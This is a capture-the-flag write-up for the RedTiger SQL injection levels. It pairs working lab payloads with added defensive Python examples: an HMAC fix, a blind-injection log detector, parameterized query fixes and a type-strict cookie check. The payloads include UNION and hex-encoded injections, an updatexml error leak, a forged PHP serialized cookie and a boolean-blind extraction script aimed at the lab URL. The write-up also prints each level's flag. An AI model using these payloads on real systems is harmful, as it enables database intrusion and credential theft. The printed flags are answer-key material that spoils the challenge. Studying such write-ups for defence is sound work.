RedTiger SQL injection notes

level1

A quick look shows this one is a numeric injection, and the table name is already given as level1_users, so appending a UNION query is all it takes. You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315

level2

A login form. I tried the classic "universal password" (an always-true condition in the password field) and it went straight through, somehow, 2333. You can raise your wechall.net score with this flag: 1222e2d4ad5da677efb188550528bfaa

level3

Trigger an error with usr[0]=1&usr[1]=1; the error message leads to the encryption source, and from the source you can build the PoC:

<?php

// warning! ugly code ahead :)

function encrypt($str)
{
    $cryptedstr = "";
    srand(3284724);                                 // fixed seed: rand() produces the same sequence on every call
    for ($i = 0; $i < strlen($str); $i++)
    {
        $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);

        while (strlen($temp) < 3)                   // zero-pad each XORed byte to three decimal digits
        {
            $temp = "0" . $temp;
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}

function decrypt($str)
{
    srand(3284724);                                 // same seed as encrypt(), so the same rand() sequence
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
    {
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false)
        {
            $decStr = "";

            for ($i = 0; $i < strlen($str); $i += 3)   // split back into three-digit groups
            {
                $array[$i / 3] = substr($str, $i, 3);
            }

            foreach ($array as $s)
            {
                $a = $s ^ rand(0, 255);             // XOR with the same keystream byte undoes encrypt()
                $decStr .= chr($a);
            }

            return $decStr;
        }
        return false;
    }
    return false;
}

// the payload is simply run through the challenge's own encrypt()
$str1 = "' union select 1,password,2,3,4,5,6 from level3_users where username='Admin ";
echo encrypt($str1);
?>

That yields the flag.
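Why the PoC is as simple as calling encrypt(): the scheme is a stream cipher whose keystream comes from a PRNG seeded with a hard-coded constant, and nothing binds the ciphertext to its owner. The following is an added illustration, not the challenge's code or anything from the original post. It rebuilds the scheme's structure in Python (random.Random stands in for PHP's srand()/rand(), so the actual bytes differ from the site's), shows the malleability that makes any client-held token forgeable, and then shows the usual fix: an HMAC over the ciphertext that is verified before decryption. MAC_KEY and all function names are constructed for this example.

```python
# Added illustration (not the challenge's code): the level3 scheme is a stream cipher whose
# keystream comes from a PRNG with a hard-coded seed. random.Random stands in for PHP's
# srand()/rand() here, so the bytes differ from the site's, but the structure is the same.
import base64
import hashlib
import hmac
import random
from typing import List, Optional

SEED = 3284724                                         # the seed hard-coded in the challenge source
MAC_KEY = b"server-side secret never sent to clients"  # constructed for this example


def keystream(n: int) -> List[int]:
    """Same seed, same sequence: every call yields the identical n bytes."""
    rng = random.Random(SEED)
    return [rng.randint(0, 255) for _ in range(n)]


def encrypt(plaintext: bytes) -> str:
    # ord(char) ^ rand(0,255), zero-padded to three decimal digits, then base64, as in the PHP
    digits = "".join("%03d" % (b ^ k) for b, k in zip(plaintext, keystream(len(plaintext))))
    return base64.b64encode(digits.encode()).decode()


def _groups(token: str) -> List[int]:
    digits = base64.b64decode(token).decode()
    return [int(digits[i:i + 3]) for i in range(0, len(digits), 3)]


def decrypt(token: str) -> bytes:
    groups = _groups(token)
    return bytes(g ^ k for g, k in zip(groups, keystream(len(groups))))


def flip_byte(token: str, index: int, delta: int) -> str:
    """Malleability: XOR a value into one ciphertext byte and the same XOR lands in the
    decrypted byte. No key is involved, which is why an unauthenticated stream cipher
    cannot protect a parameter the client is allowed to hand back."""
    groups = _groups(token)
    groups[index] ^= delta
    return base64.b64encode("".join("%03d" % g for g in groups).encode()).decode()


# Hardened variant: a MAC over the ciphertext, checked before anything is decrypted.
def encrypt_authenticated(plaintext: bytes) -> str:
    token = encrypt(plaintext)
    tag = hmac.new(MAC_KEY, token.encode(), hashlib.sha256).hexdigest()
    return token + "." + tag


def decrypt_authenticated(token_with_tag: str) -> Optional[bytes]:
    token, _, tag = token_with_tag.rpartition(".")
    expected = hmac.new(MAC_KEY, token.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None                                    # tampered or forged: refuse outright
    return decrypt(token)
```

The MAC is the part that matters: once the server refuses any token whose tag does not verify, it no longer matters that the keystream is public, because a client cannot produce a valid tag without MAC_KEY. In a real application the MAC key must be a server-side secret, and the "cipher" should be replaced by a proper authenticated construction rather than patched.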

level4

The challenge tells you the injection is in id. Further analysis shows no error messages and no data come back, so this is a blind injection.

# Python 3 version of the boolean-blind extraction script (the original used Python 2's urllib2)
from urllib.request import Request, urlopen
import string

chars = string.ascii_lowercase + '!'
url = "http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,"
header = {'Cookie': 'level4login=there_is_no_bug'}
key = ""
for i in range(1, 22):                    # positions 1..21 of keyword, as in the original
    for c in chars:
        # ask "is character i of keyword equal to c?": the page answers with 1 row for true, 0 for false
        url1 = url + str(i) + ",1)='" + c + "')"
        response = urlopen(Request(url1, None, headers=header))
        if "Query returned 1 rows." in response.read().decode('utf-8', 'replace'):
            key = key + c
            print(key)
            break                         # character found, move on to the next position
print(key)

Submit the key once you have it.
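From the defending side, a loop like the one above leaves a very distinctive trail: dozens of requests from one client to one path, each carrying a character comparison inside a boolean condition, seconds apart. The following is an added example, not part of the original post, that runs that detection over web-server access logs. The log lines are constructed for the example (the /level4.php path and query shape mirror the script above); the regexes, thresholds and function names are assumptions, not any product's rules.

```python
# Added example (not from the original post): spotting a boolean-based blind probe like the
# one above in web-server logs. Log lines below are constructed for this example.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Apache/nginx "combined"-style line: client, timestamp, request line, status, bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')

# Character-at-a-time comparisons through a string function are the fingerprint of a blind probe:
# SUBSTR(x,i,1)='c', MID(), SUBSTRING(), ASCII(SUBSTR(...)) ... inside an AND/OR boolean clause.
BLIND_PROBE = re.compile(r"\b(substr|substring|mid|ascii|ord)\s*\(", re.IGNORECASE)
BOOLEAN_PREFIX = re.compile(r"\b(and|or)\s+\d+\s*=\s*\(?\s*select\b", re.IGNORECASE)


def parse_line(line: str) -> Optional[Tuple[str, datetime, str, str]]:
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path, _, query = m.group("path").partition("?")
    return m.group("ip"), ts, path, unquote_plus(query)   # decode before matching, never on raw %20


def is_blind_probe(query: str) -> bool:
    return bool(BLIND_PROBE.search(query)) and bool(BOOLEAN_PREFIX.search(query))


def find_blind_injection(lines: List[str], threshold: int = 5,
                         window_seconds: int = 60) -> List[Tuple[str, str, int]]:
    """Return (ip, path, hits) for each client that sent >= threshold probe requests to one path
    within window_seconds. One probe is noise; a burst of them is an extraction loop."""
    hits: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, query = parsed
        if is_blind_probe(query):
            hits[(ip, path)].append(ts)

    alerts = []
    for (ip, path), times in hits.items():
        times.sort()
        best, start = 0, 0                    # sliding window over the sorted timestamps
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append((ip, path, best))
    return alerts


# Constructed sample: one client walking SUBSTR(keyword, i, 1) and one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:%02d +0000] "GET /level4.php?id=1%%20and%%201=(select%%20count(*)'
    '%%20from%%20level4_secret%%20where%%20SUBSTR(keyword,%d,1)=%%27%s%%27) HTTP/1.1" 200 1234'
    % (sec, pos, ch)
    for sec, (pos, ch) in enumerate([(1, "a"), (1, "b"), (1, "c"), (2, "a"), (2, "b"), (2, "c")])
] + [
    '198.51.100.9 - - [10/Oct/2023:13:55:30 +0000] "GET /level4.php?id=1 HTTP/1.1" 200 1234',
    '198.51.100.9 - - [10/Oct/2023:13:55:31 +0000] "GET /level4.php?id=2 HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for ip, path, n in find_blind_injection(SAMPLE_LOG):
        print("blind SQL injection probing from %s against %s: %d probes" % (ip, path, n))
```

Two design points: the query string is URL-decoded before matching (so %20 and %27 do not hide keywords from the regex), and the alert fires on a burst per client and path rather than on a single match, which is what separates an extraction loop from a one-off scanner hit.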

level5

Analysing the submitted parameters shows that username is injectable. Going for a UNION query, it turns out the string admin is banned, so encode admin as a hex literal instead. Final payload: ' union select 0x61646d696e as username, md5(1) as password # which gives the flag.

level6

A fairly obvious second-order injection (ps: I forget whether that is really what it is called). Either way, experimenting gave a few key points:
1. The user parameter is used to look up the username. The query is presumably select column_name from table_name where id = $id, and it is a numeric injection.
2. The username that comes back is then used to look up the Email field, presumably select email from table_name where username = '<result of the previous query>', and that result is returned.
3. Since we control the result of (1), we can inject into (2).
4. Key keywords are filtered.

Final payload: 0%20union%20select%201,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f75736572732077686572652069643d33202d2d20,1,1,1%20from%20level6_users%20where%20

That gives the flag: You can raise your wechall.net score with this flag: 074113b268d87dea21cc839954dec932
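The two-step lookup in points 1 to 3 is worth seeing in working code, because it is the pattern that survives keyword filters: the data that reaches query 2 never passed through the filter as user input. Below is an added example, not from the original post or the challenge, that models the flow on an in-memory SQLite database. The table, the rows, the stored username and the function names are all constructed for the example; the vulnerable version concatenates exactly as the guessed statements above do, the fixed version binds parameters and refuses a non-integer id.

```python
# Added example (not from the original post): the two-step lookup described in points 1-3,
# modelled on an in-memory SQLite database. Table, rows and function names are constructed
# for this example; the point is how the result of query 1 becomes SQL inside query 2.
import sqlite3
from typing import Optional


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin@example.test", "hash-of-admin-password"),
        # a self-registered account whose username carries SQL: inert when stored and when
        # query 1 reads it back, live the moment query 2 splices it in as text
        (2, "x' UNION SELECT password FROM users WHERE id=1 --", "nobody@example.test", "hash-of-x"),
    ])
    return db


def email_for_user_vulnerable(db: sqlite3.Connection, user: str) -> Optional[str]:
    # query 1: select column_name ... where id = $id, numeric, unquoted, unchecked
    row = db.execute("SELECT username FROM users WHERE id = " + user).fetchone()
    if row is None:
        return None
    # query 2: the username from query 1 is treated as trusted and concatenated in;
    # this is the second-order injection
    row = db.execute("SELECT email FROM users WHERE username = '" + row[0] + "'").fetchone()
    return row[0] if row else None


def email_for_user_fixed(db: sqlite3.Connection, user: str) -> Optional[str]:
    user_id = int(user)          # anything that is not an integer never reaches SQL
    row = db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    if row is None:
        return None
    # bound parameter: a username containing SQL stays a plain string to compare against
    row = db.execute("SELECT email FROM users WHERE username = ?", (row[0],)).fetchone()
    return row[0] if row else None
```

Note that the fix has to cover query 2 even though the "user input" only enters query 1: any value read back from the database and reused in another statement needs the same parameter binding as a request parameter would.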

level7

Adding a single quote after search reveals the query: SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%1' %' OR text.title LIKE '%1' %')

Final payload: 1%') union select 1,2,3,autor from level7_news --%a0

(ps: at first I had forgotten about %a0 and kept flailing with all sorts of odd tricks, 233.) That gives the flag: You can raise your wechall.net score with this flag: 970cecc0355ed85306588a1a01db4d80

level8

I'm guessing the backend SQL is update table set name='inputname',email='inputemail',icq='inputicq',age='inputage' where id=1. So if we enter hans%40localhost',name=password,icq=' in the Email field, the statement executed becomes update table set name='hans%40localhost',name=password,icq='',email='inputemail',icq='inputicq',age='inputage' where id=1. Because name appears twice in the update statement, name actually ends up with the value of the later assignment.

Final flag: You can raise your wechall.net score with this flag: 9ea04c5d4f90dae92c396cf7a6787715
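The "later assignment wins" rule is not MySQL-specific: SQLite's UPDATE documentation also states that when a column name appears more than once in the SET list, all but the rightmost occurrence are ignored, so the effect can be reproduced offline. The following is an added example, not from the original post, that runs the guessed profile update against an in-memory SQLite table, once built by string formatting and once with bound parameters. The schema, the rows and the function names are constructed; the email value is the one from the post with %40 decoded to @.

```python
# Added example (not from the original post): the profile update described above, run against
# an in-memory SQLite table. SQLite keeps only the rightmost assignment to a column in a SET
# list, which is the same "later one wins" behaviour the post relies on in MySQL.
# Schema and rows are constructed for this example.
import sqlite3
from typing import Tuple


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, "
               "icq TEXT, age TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'hans', 'hans@example.test', '1234', '30', "
               "'hash-of-hans-password')")
    return db


def update_profile_vulnerable(db: sqlite3.Connection, user_id: int,
                              name: str, email: str, icq: str, age: str) -> None:
    # the guessed backend statement, built by string formatting: every field is an injection point
    sql = "UPDATE users SET name='%s',email='%s',icq='%s',age='%s' WHERE id=%d" % (
        name, email, icq, age, user_id)
    db.execute(sql)


def update_profile_fixed(db: sqlite3.Connection, user_id: int,
                         name: str, email: str, icq: str, age: str) -> None:
    # bound parameters: a quote or an extra "name=password" inside the email is stored as text
    db.execute("UPDATE users SET name=?,email=?,icq=?,age=? WHERE id=?",
               (name, email, icq, age, user_id))


def profile(db: sqlite3.Connection, user_id: int) -> Tuple[str, str, str]:
    return db.execute("SELECT name, email, icq FROM users WHERE id=?", (user_id,)).fetchone()


# the email value from the post (%40 decoded): closes the email literal, re-assigns name
# from the password column, and reopens icq so the rest of the statement still parses
CRAFTED_EMAIL = "hans@localhost',name=password,icq='"
```

With the vulnerable version, the executed statement assigns name twice and icq twice; SQLite keeps the rightmost of each, so name becomes the password column's value while icq keeps the genuine input. With bound parameters the whole crafted string lands in the email column and name is untouched. Reading the name column back after the update is also a cheap integrity check for this class of bug in tests.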

level9

I don't think the other writeups' methods are that convenient; we can use updatexml to echo back the information we want, which I already covered in "SQL injection from scratch" (从零开始的sql注入), 2333.

payload:autor=1'&title=1'&text=1' or updatexml(1,concat(0x7e,(select password from level9_users),0x7e),0))#&post=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

This level limits how many characters are echoed back, though; you can work around that with the right function.

flag:You can raise your wechall.net score with this flag: 84ec870f1ac294508400e30d8a26a679

level10

The task is to log in as TheMaster. Change username to TheMaster and password to the boolean true and the check is bypassed: a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}, which base64-encodes to YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=

The flag: You can raise your wechall.net score with this flag:721ce43d433ad85bcfa56644b112fa52
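What makes b:1 work is the combination of unserialize() on client-supplied data and a loose == comparison: in PHP, boolean true compared with any non-empty string is true, so the password check passes without a password. The following is an added example, not from the original post or the challenge, that shows the defensive side in Python: a minimal reader for PHP's serialize() format (strings, integers, booleans, null and arrays, enough for this cookie), followed by a credential check that requires both fields to be strings before comparing and compares in constant time. The USERS table and VALID cookie are constructed; FORGED is the base64 value from the post.

```python
# Added example (not from the original post): a minimal reader for PHP's serialize() format
# and a type-strict credential check. PHP's unserialize() plus a loose == is what the cookie
# above exploits: boolean true == any non-empty string. Credentials below are constructed.
import base64
import hmac
from typing import Any, Tuple


def _parse(data: bytes, pos: int) -> Tuple[Any, int]:
    tag = data[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag == b"b":                                  # b:1;  /  b:0;
        return data[pos + 2:pos + 3] == b"1", pos + 4
    if tag == b"i":                                  # i:123;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == b"s":                                  # s:<byte length>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        value = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("bad string length at %d" % pos)
        return value.decode("utf-8"), start + length + 2
    if tag == b"a":                                  # a:<count>:{key value key value ...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            value, pos = _parse(data, pos)
            result[key] = value
        if data[pos:pos + 1] != b"}":
            raise ValueError("unterminated array at %d" % pos)
        return result, pos + 1
    raise ValueError("unsupported type %r at %d" % (tag, pos))


def php_unserialize(data: bytes) -> Any:
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after value")
    return value


USERS = {"TheMaster": "correct horse battery staple"}   # constructed; a real app stores a hash


def login_from_cookie(cookie_b64: str) -> bool:
    data = php_unserialize(base64.b64decode(cookie_b64))
    if not isinstance(data, dict):
        return False
    username, password = data.get("username"), data.get("password")
    # the fix: both fields must be strings *before* any comparison, so b:1 is rejected here,
    # and the comparison itself is constant-time rather than a loose ==
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    expected = USERS.get(username)
    return expected is not None and hmac.compare_digest(password.encode(), expected.encode())


# the cookie from the write-up above: password serialized as boolean true (b:1)
FORGED = "YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30="
# a constructed cookie carrying the real (constructed) password as a string
VALID = base64.b64encode(
    b'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";s:28:"correct horse battery staple";}'
).decode()
```

The type check is the key line, but the larger lesson is that a session cookie should not carry credentials in a format the client can rewrite at all; a server-side session id, or at minimum a signed token, removes the deserialization step and the comparison from the attacker's reach entirely.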

Once you finish all of RedTiger, your name gets added at the end.